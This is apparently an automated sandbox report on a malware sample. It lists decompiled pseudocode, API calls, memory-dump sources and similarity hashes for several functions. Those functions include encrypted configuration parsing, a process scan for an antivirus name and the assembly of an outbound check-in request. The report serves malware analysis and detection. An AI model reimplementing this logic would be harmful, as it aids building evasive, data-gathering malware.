					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x01008803
0x01008810
0x01008811
0x01008812
0x01008819
0x01008847
0x01008848
0x0100884b
0x01008851
0x00000000
0x00000000
0x01008830
0x0100883a
0x01008841
0x00000000
0x01008832
0x01008835
0x01008855
0x01008837
0x01008837
0x00000000
0x01008837
0x01008835
0x0100885c
0x01008862
0x01008862
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 0100884B

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6d4b39ab1e06aeec78ea034218c8fc0f8339ddc58d386aaa1cbc05fd8d973b94
Instruction ID: 05134dd4405f1fd6408bcf9d319884ac2de80a451aef85bdce7d5568c3530975
Opcode Fuzzy Hash: 6d4b39ab1e06aeec78ea034218c8fc0f8339ddc58d386aaa1cbc05fd8d973b94
Instruction Fuzzy Hash: D2F01971C01218EBEB01DB98D588AEDB7B8FF05304F1080AAE54263140D3B45B40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01001E09, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01001E09(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E01004DC0(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E01005DE8(_a4);
				}
				return _t12;
			}

0x01001e15
0x01001e1a
0x01001e1e
0x01001e25
0x01001e30
0x01001e34
0x01001e34
0x01001e3d

APIs

Part of subcall function 01004DC0: memcpy.NTDLL(00000000,00000090,00000002,00000002,01007859,00000008,01007859,01007859,?,010099E0,01007859), ref: 01004DF6
Part of subcall function 01004DC0: memset.NTDLL ref: 01004E6C
Part of subcall function 01004DC0: memset.NTDLL ref: 01004E80

memcpy.NTDLL(00000002,01007859,00000000,00000002,01007859,01007859,01007859,?,010099E0,01007859,?,01007859,00000002,?,?,010019AA), ref: 01001E25

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 2eb2bbc4780fc7860b60b54e476b2245f9aa325257b405ec2dcf53e37e488627
Instruction ID: bb3dea9d519a0db0ee02cd85a8b0518f47d25cda82d2b211aeaefd3b1865feee
Opcode Fuzzy Hash: 2eb2bbc4780fc7860b60b54e476b2245f9aa325257b405ec2dcf53e37e488627
Instruction Fuzzy Hash: C5E0867640011A76E7133A94DC00DEF7F5C8F61690F004012FE489A141D631C61097E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E14A8B9, Relevance: 16.7, APIs: 11, Instructions: 162COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoA.LIBCMT ref: 6E14A90B

Part of subcall function 6E15185F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E15186B
Part of subcall function 6E15185F: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E151880

GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E14A91D
___crtGetLocaleInfoA.LIBCMT ref: 6E14A93D
___crtGetLocaleInfoA.LIBCMT ref: 6E14A97F
__calloc_crt.LIBCMT ref: 6E14A952

Part of subcall function 6E14B167: __calloc_impl.LIBCMT ref: 6E14B176

__calloc_crt.LIBCMT ref: 6E14A994
_free.LIBCMT ref: 6E14A9AC
_free.LIBCMT ref: 6E14A9EC
__calloc_crt.LIBCMT ref: 6E14AA16
_free.LIBCMT ref: 6E14AA3C
__invoke_watson.LIBCMT ref: 6E14AA8C

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
String ID:
API String ID: 1731282729-0
Opcode ID: e7972124ff5b520068b58b5724fd2a98dc2e9af64d38f43a51ad998bc2a0eb00
Instruction ID: ca2c75677f100c1e818a066076be483573604fa3f62a8a238e3562f34313f5bb
Opcode Fuzzy Hash: e7972124ff5b520068b58b5724fd2a98dc2e9af64d38f43a51ad998bc2a0eb00
Instruction Fuzzy Hash: C051AEB190021AEBEB648FA5CC41F9A77BDFF14314F6284A5F81996341FB318DD4AB60

Uniqueness

Uniqueness Score: -1.00%

Function 010062D8, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E010062D8(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x100d2a0; // 0x63699bc3
				if(E01005171( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x100d2d4 = _v12;
				}
				_t25 =  *0x100d2a0; // 0x63699bc3
				if(E01005171( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x100d2a0; // 0x63699bc3
						_t31 = E01005322(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x100d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x100d2a0; // 0x63699bc3
						_t32 = E01005322(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x100d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x100d2a0; // 0x63699bc3
						_t33 = E01005322(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x100d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x100d2a0; // 0x63699bc3
						_t34 = E01005322(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x100d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x100d2a0; // 0x63699bc3
						_t35 = E01005322(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x100d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x100d2a0; // 0x63699bc3
						_t36 = E01005322(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E0100902E(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E010098F9();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x100d2a0; // 0x63699bc3
						_t37 = E01005322(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E0100902E(0, _t37) != 0) {
						_t102 =  *0x100d32c; // 0x56195b0
						E01001D3E(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x100d2a0; // 0x63699bc3
						_t38 = E01005322(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x100d2a4; // 0x460a5a8
						_t18 = _t39 + 0x100e252; // 0x616d692f
						 *0x100d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E0100902E(0, _t38);
						 *0x100d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x100d2a0; // 0x63699bc3
								_t41 = E01005322(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x100d2a4; // 0x460a5a8
								_t19 = _t42 + 0x100e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E0100902E(0, _t41);
							}
							 *0x100d340 = _t43;
							HeapFree( *0x100d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x010062d8
0x010062db
0x010062fb
0x01006309
0x01006309
0x0100630e
0x01006328
0x01006526
0x01006528
0x00000000
0x0100632e
0x0100632e
0x01006335
0x0100634b
0x01006337
0x01006337
0x01006344
0x01006344
0x01006355
0x01006357
0x01006361
0x01006366
0x01006366
0x01006361
0x0100636d
0x01006383
0x0100636f
0x0100636f
0x0100637c
0x0100637c
0x01006387
0x01006389
0x01006393
0x01006398
0x01006398
0x01006393
0x0100639f
0x010063b5
0x010063a1
0x010063a1
0x010063ae
0x010063ae
0x010063b9
0x010063bb
0x010063c5
0x010063ca
0x010063ca
0x010063c5
0x010063d1
0x010063e7
0x010063d3
0x010063d3
0x010063e0
0x010063e0
0x010063eb
0x010063ed
0x010063f7
0x010063fc
0x010063fc
0x010063f7
0x01006403
0x01006419
0x01006405
0x01006405
0x01006412
0x01006412
0x0100641d
0x0100641f
0x01006429
0x0100642e
0x0100642e
0x01006429
0x01006435
0x0100644b
0x01006437
0x01006437
0x01006444
0x01006444
0x0100644f
0x01006451
0x01006454
0x01006455
0x0100645c
0x0100645e
0x0100645f
0x0100645f
0x0100645c
0x01006466
0x0100647c
0x01006468
0x01006468
0x01006475
0x01006475
0x01006480
0x0100648e
0x01006498
0x01006498
0x0100649f
0x010064b5
0x010064a1
0x010064a1
0x010064ae
0x010064ae
0x010064b9
0x010064cc
0x010064cc
0x010064d1
0x010064d7
0x00000000
0x010064bb
0x010064be
0x010064c3
0x010064ca
0x010064dc
0x010064de
0x010064f4
0x010064e0
0x010064e0
0x010064ed
0x010064ed
0x010064f8
0x01006504
0x01006509
0x01006509
0x010064fa
0x010064fd
0x010064fd
0x01006517
0x0100651c
0x01006529
0x0100652d
0x0100652d
0x00000000
0x010064ca
0x010064b9

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,01001971,?,63699BC3,01001971,?,63699BC3,00000005,0100D00C,00000008,?,01001971), ref: 0100635D
StrToIntExA.SHLWAPI(00000000,00000000,?,01001971,?,63699BC3,01001971,?,63699BC3,00000005,0100D00C,00000008,?,01001971), ref: 0100638F
StrToIntExA.SHLWAPI(00000000,00000000,?,01001971,?,63699BC3,01001971,?,63699BC3,00000005,0100D00C,00000008,?,01001971), ref: 010063C1
StrToIntExA.SHLWAPI(00000000,00000000,?,01001971,?,63699BC3,01001971,?,63699BC3,00000005,0100D00C,00000008,?,01001971), ref: 010063F3
StrToIntExA.SHLWAPI(00000000,00000000,?,01001971,?,63699BC3,01001971,?,63699BC3,00000005,0100D00C,00000008,?,01001971), ref: 01006425
HeapFree.KERNEL32(00000000,01001971,01001971,?,63699BC3,01001971,?,63699BC3,00000005,0100D00C,00000008,?,01001971), ref: 0100651C

Strings

Uxt, xrefs: 0100651C

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: f42c3fc129918eebca910f516b065e0e0d3ec237bfb53aa354cb46dd8d78d0d1
Instruction ID: c5f952d4d7adc0b57bb9ea53ccd45f5c53bbf796a2107ca70f1c822bdf793df3
Opcode Fuzzy Hash: f42c3fc129918eebca910f516b065e0e0d3ec237bfb53aa354cb46dd8d78d0d1
Instruction Fuzzy Hash: 5761A370A00101AFF763EBFCDD8885F7BEFAB58210F654865A5C1D7188EA77D9108B61

Uniqueness

Uniqueness Score: -1.00%

Function 6E16770D, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6E167724
_wcscmp.LIBCMT ref: 6E167735
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E167751
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E16777B

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID:
API String ID: 1351282208-0
Opcode ID: b196c93c6d8ceb80e4d6c2782ef9a7e1fcf744c8a4845c96ced683d1fee1d7f9
Instruction ID: bf744c5779ffebc8cad6c5c0c21b980a6466ba310fec1ea3a0b2e9c8029d3dde
Opcode Fuzzy Hash: b196c93c6d8ceb80e4d6c2782ef9a7e1fcf744c8a4845c96ced683d1fee1d7f9
Instruction Fuzzy Hash: 7501B53120552ABFEB509FD5D848FD637ACAF05765B218016F909DE184EB70D9E1E780

Uniqueness

Uniqueness Score: -1.00%

Function 010024C7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010024C7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x100d2a4; // 0x460a5a8
						_t2 = _t9 + 0x100ee54; // 0x73617661
						_push( &_v264);
						if( *0x100d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x010024d2
0x010024dc
0x010024e0
0x010024ea
0x0100251b
0x010024f1
0x010024f6
0x01002503
0x0100250c
0x01002523
0x0100250e
0x01002516
0x00000000
0x01002516
0x01002524
0x01002525
0x00000000
0x01002525
0x00000000
0x0100251f
0x0100252b
0x01002530

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010024D7
Process32First.KERNEL32(00000000,?), ref: 010024EA
Process32Next.KERNEL32(00000000,?), ref: 01002516
CloseHandle.KERNEL32(00000000), ref: 01002525

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c82465e7f2c8f1be5f54ed200c3bec890dabc5bcfb3f8951e850a4659cae9db7
Instruction ID: 3333a119c347b0a80a0f37dba1ec77970353e73b33d067415ace7d24873b89ad
Opcode Fuzzy Hash: c82465e7f2c8f1be5f54ed200c3bec890dabc5bcfb3f8951e850a4659cae9db7
Instruction Fuzzy Hash: A3F068311001159AF763A6A58C4CEEB36ACDBC6615F000161E9CAD20C5EA35D9598765

Uniqueness

Uniqueness Score: -1.00%

Function 01005E79, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E01005E79(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x100d018; // 0x258be91c
				asm("bswap eax");
				_t27 =  *0x100d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x100d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x100d00c; // 0x13d015ef
				asm("bswap eax");
				_t30 =  *0x100d2a4; // 0x460a5a8
				_t3 = _t30 + 0x100e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d153, _t29, _t28, _t27, _t26,  *0x100d02c,  *0x100d004, _t25);
				_t33 = E0100A358();
				_t34 =  *0x100d2a4; // 0x460a5a8
				_t4 = _t34 + 0x100e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E01005369(_t91);
				if(_t96 != 0) {
					_t83 =  *0x100d2a4; // 0x460a5a8
					_t6 = _t83 + 0x100e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x100d238, 0, _t96);
				}
				_t97 = E0100A0B7();
				if(_t97 != 0) {
					_t78 =  *0x100d2a4; // 0x460a5a8
					_t8 = _t78 + 0x100e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x100d238, 0, _t97);
				}
				_t98 =  *0x100d32c; // 0x56195b0
				_a32 = E01003802(0x100d00a, _t98 + 4);
				_t42 =  *0x100d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x100d2a4; // 0x460a5a8
					_t11 = _t74 + 0x100e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x100d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x100d2a4; // 0x460a5a8
					_t13 = _t71 + 0x100e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x100d238, 0, 0x800);
					if(_t100 != 0) {
						E010010BF(GetTickCount());
						_t50 =  *0x100d32c; // 0x56195b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x100d32c; // 0x56195b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x100d32c; // 0x56195b0
						_t103 = E010061B9(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x100c2ac);
							_push(_t103);
							_t62 = E0100A755();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E01001596(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E010014EF();
								}
								HeapFree( *0x100d238, 0, _v44);
							}
							HeapFree( *0x100d238, 0, _t103);
						}
						HeapFree( *0x100d238, 0, _t100);
					}
					HeapFree( *0x100d238, 0, _a24);
				}
				HeapFree( *0x100d238, 0, _t105);
				return _a12;
			}

0x01005e79
0x01005e79
0x01005e79
0x01005e7e
0x01005e84
0x01005e8e
0x01005e90
0x01005e90
0x01005e9d
0x01005ea8
0x01005eab
0x01005eb6
0x01005eb9
0x01005ebe
0x01005ec1
0x01005ec6
0x01005ec9
0x01005ed5
0x01005ee2
0x01005ee4
0x01005eea
0x01005eef
0x01005efa
0x01005efc
0x01005eff
0x01005f06
0x01005f0a
0x01005f0c
0x01005f11
0x01005f1d
0x01005f1f
0x01005f2b
0x01005f2d
0x01005f2d
0x01005f38
0x01005f3c
0x01005f3e
0x01005f43
0x01005f4f
0x01005f51
0x01005f5d
0x01005f5f
0x01005f5f
0x01005f65
0x01005f78
0x01005f7c
0x01005f83
0x01005f86
0x01005f8b
0x01005f96
0x01005f98
0x01005f9b
0x01005f9b
0x01005f9d
0x01005fa4
0x01005fa7
0x01005fac
0x01005fb6
0x01005fb8
0x01005fc0
0x01005fd9
0x01005fdd
0x01005fe9
0x01005fee
0x01005ff7
0x01006008
0x0100600c
0x01006015
0x0100601b
0x01006028
0x01006035
0x0100603b
0x01006047
0x0100604d
0x0100604e
0x01006053
0x01006059
0x0100605f
0x01006066
0x0100606d
0x01006073
0x0100607a
0x0100607e
0x01006089
0x0100608e
0x01006094
0x0100609d
0x0100609d
0x010060ae
0x010060ae
0x010060bd
0x010060bd
0x010060cc
0x010060cc
0x010060de
0x010060de
0x010060ed
0x010060fe

APIs

GetTickCount.KERNEL32 ref: 01005E90
wsprintfA.USER32 ref: 01005EDD
wsprintfA.USER32 ref: 01005EFA
wsprintfA.USER32 ref: 01005F1D
HeapFree.KERNEL32(00000000,00000000), ref: 01005F2D
wsprintfA.USER32 ref: 01005F4F
HeapFree.KERNEL32(00000000,00000000), ref: 01005F5F
wsprintfA.USER32 ref: 01005F96
wsprintfA.USER32 ref: 01005FB6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01005FD3
GetTickCount.KERNEL32 ref: 01005FE3
RtlEnterCriticalSection.NTDLL(05619570), ref: 01005FF7
RtlLeaveCriticalSection.NTDLL(05619570), ref: 01006015

Part of subcall function 010061B9: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,01006028,?,056195B0), ref: 010061E4
Part of subcall function 010061B9: lstrlen.KERNEL32(?,?,?,01006028,?,056195B0), ref: 010061EC
Part of subcall function 010061B9: strcpy.NTDLL ref: 01006203
Part of subcall function 010061B9: lstrcat.KERNEL32(00000000,?), ref: 0100620E
Part of subcall function 010061B9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01006028,?,056195B0), ref: 0100622B

StrTrimA.SHLWAPI(00000000,0100C2AC,?,056195B0), ref: 01006047

Part of subcall function 0100A755: lstrlen.KERNEL32(05619908,00000000,00000000,770CC740,01006053,00000000), ref: 0100A765
Part of subcall function 0100A755: lstrlen.KERNEL32(?), ref: 0100A76D
Part of subcall function 0100A755: lstrcpy.KERNEL32(00000000,05619908), ref: 0100A781
Part of subcall function 0100A755: lstrcat.KERNEL32(00000000,?), ref: 0100A78C

lstrcpy.KERNEL32(00000000,?), ref: 01006066
lstrcpy.KERNEL32(00000000,00000000), ref: 0100606D
lstrcat.KERNEL32(00000000,?), ref: 0100607A
lstrcat.KERNEL32(00000000,00000000), ref: 0100607E

Part of subcall function 01001596: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,747C81D0), ref: 01001648

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 010060AE
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010060BD
HeapFree.KERNEL32(00000000,00000000,?,056195B0), ref: 010060CC
HeapFree.KERNEL32(00000000,00000000), ref: 010060DE
HeapFree.KERNEL32(00000000,?), ref: 010060ED

Strings

Uxt, xrefs: 01005F2D, 01005F5F, 010060AE, 010060BD, 010060CC, 010060DE, 010060ED

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID: Uxt
API String ID: 3080378247-1536154274
Opcode ID: a1e2dd32c7becb077cfec35630fd7cc0d8fe60d22076112a875890d277941115
Instruction ID: f14751cf19f1db2adbd03c3af582357e9cc49168d8f4304095dbab1f3b079c3f
Opcode Fuzzy Hash: a1e2dd32c7becb077cfec35630fd7cc0d8fe60d22076112a875890d277941115
Instruction Fuzzy Hash: 0B614A31500201AFE723EBE8EC48F6A7BE9EB49350F044524FAC8D7294DB2AD915DB75

Uniqueness

Uniqueness Score: -1.00%

Function 6E1492FA, Relevance: 19.8, APIs: 13, Instructions: 289timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6E149335

Part of subcall function 6E14B752: __getptd_noexit.LIBCMT ref: 6E14B752

__gmtime64_s.LIBCMT ref: 6E1493CE
__gmtime64_s.LIBCMT ref: 6E149404
__gmtime64_s.LIBCMT ref: 6E149421
__allrem.LIBCMT ref: 6E149477
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E149493
__allrem.LIBCMT ref: 6E1494AA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1494C8
__allrem.LIBCMT ref: 6E1494DF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1494FD
__invoke_watson.LIBCMT ref: 6E14956E
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E14957D
__aulldiv.LIBCMT ref: 6E14959D

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$Time$FileSystem__aulldiv__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 2599720210-0
Opcode ID: 06929933a419cd7f593819ebb6fe92a2bc4413f0a05dcbfb85437b43d8504806
Instruction ID: 8bebc798a1c78b99b29b9fe6c0cfac6b85252d5e6e7d4b3a6a6e290efc34e235
Opcode Fuzzy Hash: 06929933a419cd7f593819ebb6fe92a2bc4413f0a05dcbfb85437b43d8504806
Instruction Fuzzy Hash: 6B91C7B1A00707EBE714DFF9DD61B9A73ACAF05328F24466AE514DB780E770D9809B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E15DCDC, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6E15DCF3

Part of subcall function 6E14B167: __calloc_impl.LIBCMT ref: 6E14B176

__calloc_crt.LIBCMT ref: 6E15DD17
_free.LIBCMT ref: 6E15DD25
__calloc_crt.LIBCMT ref: 6E15DD33
_free.LIBCMT ref: 6E15DD43
_free.LIBCMT ref: 6E15DD49
__copytlocinfo_nolock.LIBCMT ref: 6E15DD58
__setmbcp_nolock.LIBCMT ref: 6E15DD79
_free.LIBCMT ref: 6E15DD87
___removelocaleref.LIBCMT ref: 6E15DD8E
___freetlocinfo.LIBCMT ref: 6E15DD95
_free.LIBCMT ref: 6E15DD9B

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

